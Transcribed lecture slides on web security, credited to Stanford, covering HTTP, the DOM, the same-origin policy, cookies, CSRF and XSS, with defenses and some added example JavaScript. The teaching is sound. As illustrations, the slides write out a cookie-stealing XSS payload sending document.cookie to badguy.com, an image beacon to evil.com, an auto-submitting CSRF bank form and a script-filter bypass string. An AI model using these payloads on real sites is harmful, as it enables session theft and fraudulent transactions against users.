Web Security
Borrowed from John Mitchell, Stanford
Web application vulnerabilities

Goals of web security
Safely browse the web: users should be able to visit a variety of web sites without incurring harm:
• No stolen information (without user’s permission)
• Site A cannot compromise session at Site B
Support secure web applications: applications delivered over the web should have the same security properties we require for stand-alone applications
Network Attacker
Intercepts and controls network communication
[Diagram: Alice, System, Network adversary]
Web Attacker
Sets up malicious site visited by victim; no control of network
[Diagram: Alice, System, Web adversary]
Web Threat Models
Web attacker
• Controls attacker.com
• Can obtain SSL/TLS certificate for attacker.com
• User visits attacker.com, or runs attacker’s Facebook app, etc.
Malware attacker
• Attacker escapes browser isolation mechanisms and runs separately under control of OS
• [not in today’s class]
HTTP
URLs
Global identifiers of network-retrievable documents
Example: http://stanford.edu:81/class?name=cs155#homework
• Protocol: http
• Hostname: stanford.edu
• Port: 81
• Path: /class
• Query: name=cs155
• Fragment: homework
Special characters are encoded as hex: %0A = newline; %20 or + = space; %2B = + (special exception)
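As an added example (not from the slides), a small JavaScript parser that splits the example URL into the parts named above and applies the percent-encoding rules the slide lists; the helper names are this example's own.

```javascript
// Added example, not from the slides: split a URL into the parts named above and
// decode the percent-encoding rules listed there (%0A, %20, "+" as space, %2B as "+").
// Helper names (parseUrl, percentDecode, parseQuery) are this example's own.
function parseUrl(url) {
  const m = /^([a-z][a-z0-9+.-]*):\/\/([^\/:?#]+)(?::(\d+))?([^?#]*)(?:\?([^#]*))?(?:#(.*))?$/i.exec(url);
  if (!m) throw new Error('not an absolute URL: ' + url);
  const [, protocol, hostname, port, path, query, fragment] = m;
  return {
    protocol: protocol.toLowerCase(),
    hostname: hostname.toLowerCase(),
    port: port === undefined ? null : Number(port),
    path: path || '/',
    query: query === undefined ? '' : query,
    fragment: fragment === undefined ? '' : fragment,   // kept by the browser, never sent
  };
}

// Decode one percent-encoded component byte by byte (ASCII only, which is all the
// slide's examples need). A bare "+" is a space only where the caller says so
// (the query part); "%2B" always decodes to a literal "+". Malformed escapes
// ("%G1", a trailing "%") are rejected rather than passed through.
function percentDecode(s, { plusIsSpace = false } = {}) {
  let out = '';
  for (let i = 0; i < s.length; i++) {
    const c = s[i];
    if (c === '%') {
      const hex = s.slice(i + 1, i + 3);
      if (!/^[0-9a-f]{2}$/i.test(hex)) throw new Error('malformed escape at offset ' + i);
      out += String.fromCharCode(parseInt(hex, 16));
      i += 2;
    } else if (c === '+' && plusIsSpace) {
      out += ' ';
    } else {
      out += c;
    }
  }
  return out;
}

// Query string -> list of [name, value] pairs. A list, not an object, so a repeated
// name ("a=1&a=2") stays visible to the application instead of being silently collapsed.
function parseQuery(query) {
  if (query === '') return [];
  return query.split('&').map(pair => {
    const eq = pair.indexOf('=');
    const name = eq < 0 ? pair : pair.slice(0, eq);
    const value = eq < 0 ? '' : pair.slice(eq + 1);
    return [percentDecode(name, { plusIsSpace: true }), percentDecode(value, { plusIsSpace: true })];
  });
}

// The slide's example, walked through the helpers.
const EXAMPLE = parseUrl('http://stanford.edu:81/class?name=cs155#homework');
const EXAMPLE_QUERY = parseQuery(EXAMPLE.query);   // [['name', 'cs155']]
```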
HTTP Request
GET /index.html HTTP/1.1
Accept: image/gif, image/x-bitmap, image/jpeg, */*
Accept-Language: en
Connection: Keep-Alive
User-Agent: Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)
Host: www.example.com
Referer: http://www.google.com?q=dingbats

Parts: request line (Method, File, HTTP version), Headers, Blank line, Data (none for GET)
GET: no side effect. POST: possible side effect.
HTTP Response
HTTP/1.0 200 OK
Date: Sun, 21 Apr 1996 02:20:42 GMT
Server: Microsoft-Internet-Information-Server/5.0
Connection: keep-alive
Content-Type: text/html
Last-Modified: Thu, 18 Apr 1996 17:39:05 GMT
Set-Cookie: …
Content-Length: 2543

<HTML> Some data... blah, blah, blah </HTML>

Parts: status line (HTTP version, Status code, Reason phrase), Headers, Data. The Set-Cookie header carries cookies.
RENDERING CONTENT
Rendering and events
Basic browser execution model: each browser window or frame
• Loads content
• Renders it: processes HTML and scripts to display page; may involve images, subframes, etc.
• Responds to events
Events can be
• User actions: OnClick, OnMouseover
• Rendering: OnLoad, OnBeforeUnload
• Timing: setTimeout(), clearTimeout()
Example:
<html>
  <body>
    <div style="-webkit-transform: rotateY(30deg) rotateX(-30deg); width: 200px;">
      I am a strange root.
    </div>
  </body>
</html>
Source: http://www.html5rocks.com/en/tutorials/speed/layers/
HTML Image Tags
<html> … <p> … </p> … <img src="http://example.com/sunset.gif" height="50" width="100"> … </html>
Displays this nice picture. Security issues?
Basic web functionality
Image tag security issues
• Communicate with other sites: <img src="http://evil.com/pass-local-information.jpg?extra_information">
• Hide resulting image: <img src=" … " height="1" width="1">
• Spoof other sites: add logos that fool a user
Important Point: A web page can send information to any site
Security consequences
Document Object Model (DOM)
Object-oriented interface used by scripts to dynamically access and modify web pages
• Web page in HTML is structured data
• DOM provides representation of this hierarchy
Examples
• Properties: document.alinkColor, document.URL, document.forms[ ], document.links[ ], …
• Methods: document.write(document.referrer)
Includes Browser Object Model (BOM): window, document, frames[], history, location, navigator (type and version of browser)
Changing HTML using JavaScript
Some possibilities: createElement(elementName), createTextNode(text), appendChild(newChild), removeChild(node)
Example: Add a new list item (JavaScript code):
var text = 'Item 2'   // assumed: the label for the new item (the slide leaves `text` undefined)
var list = document.getElementById('t1')
var newitem = document.createElement('li')
var newtext = document.createTextNode(text)
list.appendChild(newitem)
newitem.appendChild(newtext)
HTML:
<ul id="t1"><li> Item 1 </li></ul>
Frame and iFrame
Window may contain frames from different sources
• Frame: rigid division as part of frameset
• iFrame: floating inline frame
iFrame example:
<iframe src="hello.html" width=450 height=100>
  If you can see this, your browser doesn't understand IFRAME.
</iframe>
Why use frames?
• Delegate screen area to content from another source
• Browser provides isolation based on frames
• Parent may work even if frame is broken
ISOLATION
Same Origin Policy (SOP)
Each frame of a page has an origin: Origin = protocol://host:port
Frame can access its own origin: network access, read/write DOM, storage (cookies)
Frame cannot access data associated with a different origin
[Diagram: a page containing frames from origins A and B; each frame reaches only its own origin]
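As an added example (not from the slides), the origin tuple defined above and the comparison a browser makes before one frame's script may touch another frame's DOM, in JavaScript; the frame tree and helper names are this example's own.

```javascript
// Added example, not from the slides: the origin tuple the slide defines and the
// comparison a browser makes before one frame's script may touch another's DOM.
// Helper names (originOf, sameOrigin, frameMayAccess) are this example's own.
const DEFAULT_PORTS = { http: 80, https: 443 };

function originOf(url) {
  const m = /^([a-z][a-z0-9+.-]*):\/\/([^\/:?#]+)(?::(\d+))?/i.exec(url);
  if (!m) throw new Error('not an absolute URL: ' + url);
  const protocol = m[1].toLowerCase();
  const host = m[2].toLowerCase();
  const port = m[3] === undefined ? DEFAULT_PORTS[protocol] : Number(m[3]);
  if (port === undefined) throw new Error('no default port known for scheme ' + protocol);
  return { protocol, host, port };
}

// All three components must match; path, query and fragment play no part.
function sameOrigin(urlA, urlB) {
  const a = originOf(urlA), b = originOf(urlB);
  return a.protocol === b.protocol && a.host === b.host && a.port === b.port;
}

// Constructed frame tree: a top page embedding frames from two origins, as in the
// slide's A/B diagram. Each frame records the URL its document was loaded from.
const FRAMES = {
  top:    'http://a.com/index.html',
  left:   'http://a.com/widgets/clock.html',   // same origin as top
  right:  'http://b.com/ad.html',              // different host
  secure: 'https://a.com/login.html',          // same host, different scheme
};

// Would the SOP let script in frame `from` read or write the DOM of frame `to`?
function frameMayAccess(from, to) {
  if (!(from in FRAMES) || !(to in FRAMES)) throw new Error('unknown frame');
  return sameOrigin(FRAMES[from], FRAMES[to]);
}

// Every pair, so the reader can see which edges of the diagram are allowed.
function accessMatrix() {
  const names = Object.keys(FRAMES);
  const rows = {};
  for (const from of names) {
    rows[from] = {};
    for (const to of names) rows[from][to] = frameMayAccess(from, to);
  }
  return rows;
}
```

Cookies are scoped by the separate <domain, path> rule on the Cookie Security Policy slide, not by this tuple, which is why a cookie can cross subdomains that the SOP keeps apart.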
JavaScript
“The world’s most misunderstood programming language”
• Related to Java in name only; name was part of a marketing deal
• “Java is to JavaScript as car is to carpet”
Language executed by the browser
• Scripts are embedded in Web pages
• Can run before HTML is loaded, before page is viewed, while it is being viewed, or when leaving the page
Potentially malicious website gets to execute some code on user’s machine
But: scripts excluded from SOP!
<script src=https://seal.verisign.com/getseal?host_name=a.com></script>
• Script has privileges of importing page, NOT source server.
• Can script other pages in this origin, load more scripts
• Other forms of importing
[Figure: VeriSign seal]
Inter-frame communication policy?
[Diagram: candidate policies Child, Sibling, Descendant, Frame Bust]
Legacy Browser Behavior

| Browser | Policy |
|---|---|
| IE 6 (default) | Permissive |
| IE 6 (option) | Child |
| IE7 (no Flash) | Descendant |
| IE7 (with Flash) | Permissive |
| Firefox 2 | Window |
| Safari 3 | Permissive |
| Opera 9 | Window |
| HTML 5 | Child |
COOKIES: CLIENT STATE
Cookies
Used to store state on user’s machine
Browser -> Server: POST …
Server -> Browser, HTTP header:
Set-cookie: NAME=VALUE ;
  domain = (who can read) ;
  expires = (when expires) ;
  secure = (only over SSL)
Browser -> Server: POST …
Cookie: NAME = VALUE
HTTP is a stateless protocol; cookies add state
If expires=NULL: this session only
Cookie authentication (Browser, Web Server, Auth server)
1. Browser -> Web Server: POST login.cgi (username & pwd)
2. Web Server -> Auth server: validate user
3. Auth server -> Web Server: auth=val (Auth server stores val)
4. Web Server -> Browser: Set-cookie: auth=val
5. Browser -> Web Server: GET restricted.html, Cookie: auth=val
6. Web Server -> Auth server: auth=val; Auth server checks val and answers YES/NO
7. If YES, Web Server -> Browser: restricted.html
Cookie Security Policy
Uses:
• User authentication
• Personalization
• User tracking: e.g. Doubleclick (3rd party cookies)
Browser will store: at most 20 cookies/site, 3 KB / cookie
Origin is the tuple <domain, path>; a site can set cookies valid across a domain suffix
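As an added example (not from the slides), the Set-Cookie attributes listed above applied in JavaScript to decide which Domain values a site may set and which stored cookies a browser attaches to a request; the helper names, sample cookies and the tiny public-suffix list are this example's own.

```javascript
// Added example, not from the slides: the Set-Cookie attributes listed above
// (domain, path, expires, secure) applied to decide which stored cookies a
// browser attaches to a request, and which Domain values a site may set.
// Names (parseSetCookie, cookieHeaderFor, ...) and the tiny public-suffix
// list are this example's own; a real browser uses the full public suffix list.
const PUBLIC_SUFFIXES = new Set(['com', 'edu', 'org', 'co.uk']);   // constructed, illustrative only

// Domain match: the host is the domain itself or ends with "." + domain.
function domainMatches(host, domain) {
  return host === domain || host.endsWith('.' + domain);
}

// "/account" covers "/account" and "/account/..." but not "/accounts".
function pathMatches(requestPath, cookiePath) {
  if (requestPath === cookiePath) return true;
  if (!requestPath.startsWith(cookiePath)) return false;
  return cookiePath.endsWith('/') || requestPath[cookiePath.length] === '/';
}

// Parse one Set-Cookie header value received from settingHost.
// Returns null when the cookie must be rejected: Domain is not a suffix of the
// setting host, or is a public suffix, so one site cannot plant cookies on another.
function parseSetCookie(header, settingHost) {
  const [pair, ...attrs] = header.split(';').map(s => s.trim());
  const eq = pair.indexOf('=');
  if (eq <= 0) return null;
  const cookie = { name: pair.slice(0, eq), value: pair.slice(eq + 1),
                   domain: settingHost.toLowerCase(), hostOnly: true,
                   path: '/', secure: false, expires: null };   // expires null => session cookie
  for (const attr of attrs) {
    const at = attr.indexOf('=');
    const key = (at < 0 ? attr : attr.slice(0, at)).trim().toLowerCase();
    const val = at < 0 ? '' : attr.slice(at + 1).trim();
    if (key === 'domain') {
      const d = val.replace(/^\./, '').toLowerCase();
      if (!domainMatches(cookie.domain, d) || PUBLIC_SUFFIXES.has(d)) return null;
      cookie.domain = d; cookie.hostOnly = false;
    } else if (key === 'path') cookie.path = val.startsWith('/') ? val : '/';
    else if (key === 'secure') cookie.secure = true;
    else if (key === 'expires') cookie.expires = new Date(val);
  }
  return cookie;
}

// "Cookie:" header value for a request to url, built from the parsed cookies in jar.
function cookieHeaderFor(jar, url, now = new Date()) {
  const m = /^(https?):\/\/([^\/:?#]+)(?::\d+)?([^?#]*)/i.exec(url);
  if (!m) throw new Error('not an http(s) URL: ' + url);
  const scheme = m[1].toLowerCase(), host = m[2].toLowerCase(), reqPath = m[3] || '/';
  return jar
    .filter(c => (c.hostOnly ? host === c.domain : domainMatches(host, c.domain)))
    .filter(c => pathMatches(reqPath, c.path))
    .filter(c => !c.secure || scheme === 'https')      // secure: only over SSL/TLS
    .filter(c => c.expires === null || c.expires > now)
    .map(c => c.name + '=' + c.value)
    .join('; ');
}
```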
WEB SITE VULNERABILITIES
Three top web site vulnerabilities
SQL Injection
• Browser sends malicious input to server
• Bad input checking leads to malicious SQL query
CSRF – Cross-site request forgery
• Bad web site sends request to good web site, using credentials of an innocent victim who “visits” the bad site
XSS – Cross-site scripting
• Bad web site sends innocent victim a script that steals information from an honest web site
• Inject malicious script into trusted context
• Leverage user’s session at victim server
In TIRGUL
Cross Site Request Forgery
Recall: session using cookies
1. Browser -> Server: POST /login.cgi
2. Server -> Browser: Set-cookie: authenticator
3. Browser -> Server: GET … Cookie: authenticator
4. Server -> Browser: response
Basic picture
[Diagram: Attack Server, Server Victim, User Victim]
1. User Victim establishes session with Server Victim
2. User Victim visits Attack Server (or an iframe from it)
3. User Victim receives malicious page
4. User Victim’s browser sends forged request to Server Victim
Q: how long do you stay logged on to Gmail? (w/ cookie)
Cross Site Request Forgery (CSRF)
Example: User logs in to bank.com; session cookie remains in browser state
User visits another site containing:
<form name=F action=http://bank.com/BillPay.php>
  <input name=recipient value=badguy> …
<script> document.F.submit(); </script>
Browser sends user auth cookie with request; transaction will be fulfilled
Problem: cookie auth is insufficient when side effects occur
Form post with cookie
[Figure: form post carrying the user credentials, Cookie: SessionID=523FA4cd2E]
CSRF Defenses
• Secret Validation Token: <input type=hidden value=23a3af01b>
• Referer Validation: Referer: http://www.facebook.com/home.php
• Custom HTTP Header: X-Requested-By: XMLHttpRequest
Secret Token Validation
• Server sends dynamic form HTML
• Form includes a hidden hard-to-guess secret; unguessability substitutes for unforgeability
• When browser POSTs the filled form, hidden token is sent back with other fields (and session cookie is sent too)
• Server verifies that token is valid and matches session
Secret Token Validation [figure]
Referer Validation [figure: referring page; Cookie: SessionID=523FA4cd2E]
Referer Validation Defense
HTTP Referer header:
• Referer: http://www.facebook.com/
• Referer: http://www.attacker.com/evil.html
• Referer: (absent)
Lenient Referer validation: doesn't work if Referer is missing
Strict Referer validation: secure, but Referer is sometimes absent…
Referer Privacy Problems
Referer may leak privacy-sensitive information, e.g. http://intranet.corp.apple.com/projects/iphone/competitors.html
Common sources of Referer stripping:
• Network stripping by the organization
• Network stripping by local machine
• Stripped by browser for HTTPS -> HTTP transitions
• User preference in browser
• Buggy user agents
Site cannot afford to block these users
CSRF Recommendations
Users: when accessing a sensitive site (like a bank)
• Use a different browser, not just a new tab/window
• Don’t open other tabs while logged in
• Always logout (don’t just X the tab); logging out invalidates the session cookie
Site developers:
• Use anti-CSRF techniques; especially important on sensitive sites
Cross Site Scripting (XSS)
Basic scenario: reflected XSS attack
[Diagram: Attack Server, Victim Server, Victim client]
1. Victim client visits web site (Attack Server)
2. Victim client receives malicious link
3. Victim client clicks on link (request goes to Victim Server)
4. Victim Server echoes user input
5. Victim client sends valuable data (to Attack Server)
XSS example: vulnerable site
Search field on victim.com: http://victim.com/search.php?term=apple
Server-side implementation of search.php:
<HTML> <TITLE> Search Results </TITLE>
<BODY>
Results for <?php echo $_GET[term] ?> :
. . .
</BODY> </HTML>
Echoes the search term into the response
Bad input
Consider link (properly URL encoded):
http://victim.com/search.php?term=<script> window.open("http://badguy.com?cookie=" + document.cookie) </script>
What if user clicks on this link?
1. Browser goes to victim.com/search.php
2. victim.com returns <HTML> Results for <script> … </script>
3. Browser executes script: sends badguy.com the cookie for victim.com
[Diagram: www.attacker.com (Attack Server), www.victim.com (Victim Server), Victim client]
• User gets bad link: http://victim.com/search.php?term=<script> ... </script>
• User clicks on link
• Victim echoes user input: <html> Results for <script> window.open(http://attacker.com? ... document.cookie ...) </script></html>
Basic scenario: reflected XSS attack (email version)
[Diagram: Attack Server, Server Victim, User Victim]
1. Attack Server collects email address
2. Attack Server sends malicious email
3. User Victim clicks on link (request goes to Server Victim)
4. Server Victim echoes user input
5. User Victim sends valuable data (to Attack Server)
Stored XSS
[Diagram: Attack Server, Server Victim, User Victim]
1. Attack Server injects malicious script into Server Victim (stores bad stuff)
2. User Victim requests content
3. User Victim receives malicious script (downloads it)
4. Script steals valuable data (sent to Attack Server)
Stored XSS using images
Suppose pic.jpg on web server contains HTML!
Request for http://site.com/pic.jpg results in:
HTTP/1.1 200 OK
…
Content-Type: image/jpeg

<html> fooled ya </html>
IE will render this as HTML (despite Content-Type)
• Consider photo sharing sites that support image uploads
• What if attacker uploads an “image” that is a script?
Defenses at server
[Diagram: Attack Server, Server Victim, User Victim]
1. User Victim visits web site
2. User Victim receives malicious page
3. User Victim clicks on link
4. Server Victim echoes user input
5. User Victim sends valuable data
How to Protect Yourself (OWASP)
Validate all headers, cookies, query strings, form fields, hidden fields against a rigorous specification of what should be allowed. Do not attempt to identify active content and remove, filter, or sanitize it. There are too many types and too many ways of encoding. Adopt a ‘positive’ security policy that specifies what is allowed. ‘Negative’ or attack signature based policies are difficult to maintain and are likely to be incomplete.
Input data validation and filtering
• Never trust client-side data
• Best: allow only what you expect
• Remove/encode special characters; many encodings, special chars! E.g., long (non-standard) UTF-8 encodings
Problems with filters
Suppose a filter removes <script
Good case: <script src=" ..." becomes src=" ..."
But then: <scr<scriptipt src=" ..." becomes <script src=" ..."